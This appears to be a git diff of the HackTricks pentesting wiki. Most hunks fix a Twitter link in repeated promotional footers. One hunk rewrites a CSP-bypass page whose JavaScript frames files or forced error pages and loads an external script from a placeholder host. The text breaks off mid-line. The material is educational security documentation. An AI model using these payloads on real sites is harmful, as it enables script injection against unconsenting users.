submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. @@ -275,7 +275,7 @@ Find vulnerabilities that matter most so you can fix them faster. Intruder track * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/network-services-pentesting/pentesting-web/tomcat/basic-tomcat-info.md b/network-services-pentesting/pentesting-web/tomcat/basic-tomcat-info.md index 97884fdf0..04d7dd1fc 100644 --- a/network-services-pentesting/pentesting-web/tomcat/basic-tomcat-info.md +++ b/network-services-pentesting/pentesting-web/tomcat/basic-tomcat-info.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. @@ -171,7 +171,7 @@ Find vulnerabilities that matter most so you can fix them faster. Intruder track * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/pentesting-web/abusing-hop-by-hop-headers.md b/pentesting-web/abusing-hop-by-hop-headers.md index a70f6edc9..bf05da284 100644 --- a/pentesting-web/abusing-hop-by-hop-headers.md +++ b/pentesting-web/abusing-hop-by-hop-headers.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. @@ -48,7 +48,7 @@ If a cache server incorrectly caches content based on hop-by-hop headers, an att * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md b/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md index 436b61f7b..45ba950aa 100644 --- a/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md +++ b/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md @@ -18,61 +18,59 @@ Other ways to support HackTricks: A configuration such as: ``` -Content-Security-Policy: default-src β€˜self’ β€˜unsafe-inline’; +Content-Security-Policy: default-src 'self' 'unsafe-inline'; ``` Prohibits usage of any functions that execute code transmitted as a string. For example: `eval, setTimeout, setInterval` will all be blocked because of the setting `unsafe-eval` Any content from external sources is also blocked, including images, CSS, WebSockets, and, especially, JS -## Via text & images +### Via Text & Images -Modern browsers transform images and texts into HTML files to visualize them better (set background, center, etc). - -Therefore, if you **open an image or txt file** such as **favicon.ico** or **robots.txt** with an **`iframe`**, you will open it as HTML. - -**These kinds of pages usually don't have CSP headers and might not have X-Frame-Options**, so you can execute arbitrary JS from them: +It's observed that modern browsers convert images and texts into HTML to enhance their display (e.g., setting backgrounds, centering, etc.). Consequently, if an image or text file, such as `favicon.ico` or `robots.txt`, is opened via an `iframe`, it's rendered as HTML. Notably, these pages often lack CSP headers and may not include X-Frame-Options, enabling the execution of arbitrary JavaScript from them: ```javascript frame=document.createElement("iframe"); frame.src="/css/bootstrap.min.css"; document.body.appendChild(frame); script=document.createElement('script'); -script.src='//bo0om.ru/csp.js'; +script.src='//example.com/csp.js'; window.frames[0].document.head.appendChild(script); ``` -## Via Errors +### Via Errors -Same as text files or images, **error responses usually don't have CSP headers and might not have X-Frame-Options**. So, you can force errors and load them inside an iframe: +Similarly, error responses, like text files or images, typically come without CSP headers and might omit X-Frame-Options. Errors can be induced to load within an iframe, allowing for the following actions: ```javascript -// Force nginx error +// Inducing an nginx error frame=document.createElement("iframe"); frame.src="/%2e%2e%2f"; document.body.appendChild(frame); -// Force error via long URL +// Triggering an error with a long URL frame=document.createElement("iframe"); frame.src="/"+"A".repeat(20000); document.body.appendChild(frame); -// Force error via long cookies +// Generating an error via extensive cookies for(var i=0;i<5;i++){document.cookie=i+"="+"a".repeat(4000)}; frame=document.createElement("iframe"); frame.src="/"; document.body.appendChild(frame); -// Don't forget to remove them +// Removal of cookies is crucial post-execution for(var i=0;i<5;i++){document.cookie=i+"="} ``` +After triggering any of the mentioned scenarios, JavaScript execution within the iframe is achievable as follows: + ```javascript -// After any of the previous examples, you can execute JS in the iframe with something like: script=document.createElement('script'); -script.src='//bo0om.ru/csp.js'; +script.src='//example.com/csp.js'; window.frames[0].document.head.appendChild(script); ``` + ## References * [https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/) diff --git a/pentesting-web/dependency-confusion.md b/pentesting-web/dependency-confusion.md index a1e602a5c..34a06ca79 100644 --- a/pentesting-web/dependency-confusion.md +++ b/pentesting-web/dependency-confusion.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. @@ -58,7 +58,7 @@ In the [**original post about dependency confusion**](https://medium.com/@alex.b * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md b/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md index e14364c29..1283463cf 100644 --- a/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md +++ b/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. @@ -211,7 +211,7 @@ namespace DeserializationTests * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.md b/pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.md index b8efc747d..09262d8a0 100644 --- a/pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.md +++ b/pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. @@ -245,7 +245,7 @@ You can find more gadgets here: [https://deadcode.me/blog/2016/09/02/Blind-Java- * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/pentesting-web/file-upload/pdf-upload-xxe-and-cors-bypass.md b/pentesting-web/file-upload/pdf-upload-xxe-and-cors-bypass.md index 47e086df5..a71c294f8 100644 --- a/pentesting-web/file-upload/pdf-upload-xxe-and-cors-bypass.md +++ b/pentesting-web/file-upload/pdf-upload-xxe-and-cors-bypass.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. @@ -21,7 +21,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/pentesting-web/http-connection-request-smuggling.md b/pentesting-web/http-connection-request-smuggling.md index e557a5b3e..1f0d638e7 100644 --- a/pentesting-web/http-connection-request-smuggling.md +++ b/pentesting-web/http-connection-request-smuggling.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. @@ -56,7 +56,7 @@ To identify these vulnerabilities, the 'connection-state probe' feature in HTTP * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/pentesting-web/integer-overflow.md b/pentesting-web/integer-overflow.md index 6ca368ed0..9c8c9f409 100644 --- a/pentesting-web/integer-overflow.md +++ b/pentesting-web/integer-overflow.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. @@ -57,7 +57,7 @@ int main() { * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/pentesting-web/login-bypass/README.md b/pentesting-web/login-bypass/README.md index 60dd0a305..8a64c3d90 100644 --- a/pentesting-web/login-bypass/README.md +++ b/pentesting-web/login-bypass/README.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. @@ -121,7 +121,7 @@ Pages usually redirects users after login, check if you can alter that redirect * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord 